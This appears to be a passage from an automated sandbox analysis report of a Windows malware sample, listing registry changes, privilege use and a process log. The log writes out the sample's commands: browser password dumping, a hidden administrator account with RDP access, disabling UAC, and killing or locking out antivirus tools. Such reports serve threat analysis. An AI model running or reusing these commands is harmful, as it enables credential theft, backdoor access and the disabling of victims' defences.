| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\exe\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\hs | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\exe\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\xmr64 | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\xmr | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\windowsnode | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\min | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hs_module | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\WindowsDefender | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\P.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\ProgramData\WindowsTask\AppHost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\svchost.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\P.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\rootsystem\P.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\R8.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\winlogon.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Microsoft\Intel\Vega.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\MOS.exe | N/A |
| N/A | N/A | C:\programdata\microsoft\intel\Vegas.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Programdata\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Programdata\Windows\rutserv.exe
rutserv.exe /start
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\programdata\microsoft\intel\winlogon.exe
"C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7CB2.tmp\7CB3.bat C:\programdata\microsoft\intel\winlogon.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\ProgramData\Microsoft\Intel\Vega.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p123
C:\programdata\microsoft\intel\MOS.exe
C:\programdata\microsoft\intel\MOS.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)
C:\programdata\microsoft\intel\Vegas.exe
"C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\olly.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\Iostream.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A1BE.tmp\A1BF.bat C:\programdata\microsoft\intel\Vegas.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
C:\Windows\system32\takeown.exe
takeown /f c:\windows\system32\systemreset.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
C:\Windows\system32\icacls.exe
icacls c:\windows\system32\systemreset.exe /setowner Admin
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe
"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
C:\Windows\system32\icacls.exe
icacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F
C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" "John" /add
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
C:\ProgramData\RealtekHD\taskhostw.exe
C:\ProgramData\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
C:\Programdata\Windows\rfusclient.exe
C:\Programdata\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
